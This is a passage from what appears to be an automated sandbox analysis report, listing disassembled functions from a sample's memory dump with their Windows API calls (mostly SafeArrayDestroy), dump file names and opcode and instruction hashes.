                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04884F Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: f616203d81070507ecc032258f33e0b7be52a04c4811d0abc45a20e3909c65e3
                                                                                                          • Instruction ID: 05c8d9454ad4375452243149e0a6154aeb5c73a319143b9c2d9b37c7d7a72690
                                                                                                          • Opcode Fuzzy Hash: f616203d81070507ecc032258f33e0b7be52a04c4811d0abc45a20e3909c65e3
                                                                                                          • Instruction Fuzzy Hash: 33311A74E00618DFDB10DF69CC80B9EB7FABF95200F6085AAE419E7241D775E9418F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F040561 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 2df40b642f45c05818cf3181f9b4d25181636a05fad38ed963b137cd42bdd6b9
                                                                                                          • Instruction ID: 785e30b3ecfa838b44b7c29d456feda401f195000a6b74bd7084c649a4674d64
                                                                                                          • Opcode Fuzzy Hash: 2df40b642f45c05818cf3181f9b4d25181636a05fad38ed963b137cd42bdd6b9
                                                                                                          • Instruction Fuzzy Hash: 06310970E00618DFDB10DBA9CD80B9DB7F9AF89200F24859AE519E7256DB71ED818F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0403DE Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 79a3ce9ab7c6a9e89ee98d5686098d86db9f2d2ca532bdc28ea09398d2748601
                                                                                                          • Instruction ID: 06c777dd72401f932c37dbc3b4819fd8ae23d13ccd5677c7d609b99707fed291
                                                                                                          • Opcode Fuzzy Hash: 79a3ce9ab7c6a9e89ee98d5686098d86db9f2d2ca532bdc28ea09398d2748601
                                                                                                          • Instruction Fuzzy Hash: E9311A70E00618DFCB10CFA9CD80B9DB7F9AF85200F60869AE418E7295CB71E981CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0402C2 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 7cfdbd85884e4dda2bb05af684976910bc6654d6e23fd1a701fcde357eaca674
                                                                                                          • Instruction ID: e459fee9385072ad62e3ecaac57a1442b594cf312f98c9ca2dd1948a55746020
                                                                                                          • Opcode Fuzzy Hash: 7cfdbd85884e4dda2bb05af684976910bc6654d6e23fd1a701fcde357eaca674
                                                                                                          • Instruction Fuzzy Hash: B0311A70A00618DFCB10CBA9CD80B9DB7F9AF85200F60869AE459E7296DB71E981CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0401BE Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: f251e82f89945f95f441bb26d6f6ff787d456b5ffebd08cbd0e684f12e6ff961
                                                                                                          • Instruction ID: 51435059cf29785f15306796b33b1423a07ad1fbe59c3b6070b8895f1bb50e56
                                                                                                          • Opcode Fuzzy Hash: f251e82f89945f95f441bb26d6f6ff787d456b5ffebd08cbd0e684f12e6ff961
                                                                                                          • Instruction Fuzzy Hash: 73310B70E00618DFDB10DBA9CD80B9DB7FAAF85200F2485AAE419E7256DB71ED81CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0400B4 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 2f26af9af0ac68871a69f629a45148ace86807f10eabb0dd4b174ca04502becb
                                                                                                          • Instruction ID: 3dabb248a50e43ed5b9a0fb26086cfe1e1fc206f18f27b046cdca65f07a3c49c
                                                                                                          • Opcode Fuzzy Hash: 2f26af9af0ac68871a69f629a45148ace86807f10eabb0dd4b174ca04502becb
                                                                                                          • Instruction Fuzzy Hash: 0E311870A00618DFCB10DBA9CD80B9DB7F9AF89200F20859AE418E7252CB71E9818F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03FD9F Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: f616203d81070507ecc032258f33e0b7be52a04c4811d0abc45a20e3909c65e3
                                                                                                          • Instruction ID: f41549042b30814e3d4718b50257f5fb51b1e6dc26596e46e02c116d534de29e
                                                                                                          • Opcode Fuzzy Hash: f616203d81070507ecc032258f33e0b7be52a04c4811d0abc45a20e3909c65e3
                                                                                                          • Instruction Fuzzy Hash: 21310875E00618DFDB10CBA9CD84B9DB7FAAF89200F24859AE419E7252DB71ED818F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F049011 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 2df40b642f45c05818cf3181f9b4d25181636a05fad38ed963b137cd42bdd6b9
                                                                                                          • Instruction ID: f5ebd4769bc48cef123e76adaf9eac5799c2fb6d819ea7b7b4b07aebd106e4f2
                                                                                                          • Opcode Fuzzy Hash: 2df40b642f45c05818cf3181f9b4d25181636a05fad38ed963b137cd42bdd6b9
                                                                                                          • Instruction Fuzzy Hash: DA311974A00618DFCB10DFA9CD80B9EB7FABF85200F6085AAE429E7245D775E9418F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F09249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6F0925B1,?,00000000,?), ref: 6F0924E6
                                                                                                          • _malloc.LIBCMT ref: 6F09251B
                                                                                                          • _memset.LIBCMT ref: 6F09253B
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6F092550
                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6F09255E
                                                                                                          • __freea.LIBCMT ref: 6F092568
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 525495869-0
                                                                                                          • Opcode ID: 55546289222353f2149016810893230d1026f2aa220be0f70f2210eb30aee3eb
                                                                                                          • Instruction ID: dbbb310ef287f16718d3e2333cb5feafd816b5d9a26b3815ff72456f39056a09
                                                                                                          • Opcode Fuzzy Hash: 55546289222353f2149016810893230d1026f2aa220be0f70f2210eb30aee3eb
                                                                                                          • Instruction Fuzzy Hash: CC313CB160020AEFEF01DF64DC90FAE7BE9EB48354F515426F91597290E734E960AB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F048A39 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F046A08
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F046A15
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F046A41
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                                          • String ID:
                                                                                                          • API String ID: 757764206-0
                                                                                                          • Opcode ID: c6d879c57987caf736faa8f1fede89b00092cdcbc1a3741fdd4772d2911f4e70
                                                                                                          • Instruction ID: b549f36691b0d2ae56f46ce69001c76b9b01e0ed99478bc61702eb4f13159483
                                                                                                          • Opcode Fuzzy Hash: c6d879c57987caf736faa8f1fede89b00092cdcbc1a3741fdd4772d2911f4e70
                                                                                                          • Instruction Fuzzy Hash: F031F971E00618EFCB10DF69CC80B9EB7FAAF95610F6446AAE429E7241C775E9808F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0487EE Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F046A08
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F046A15
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F046A41
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
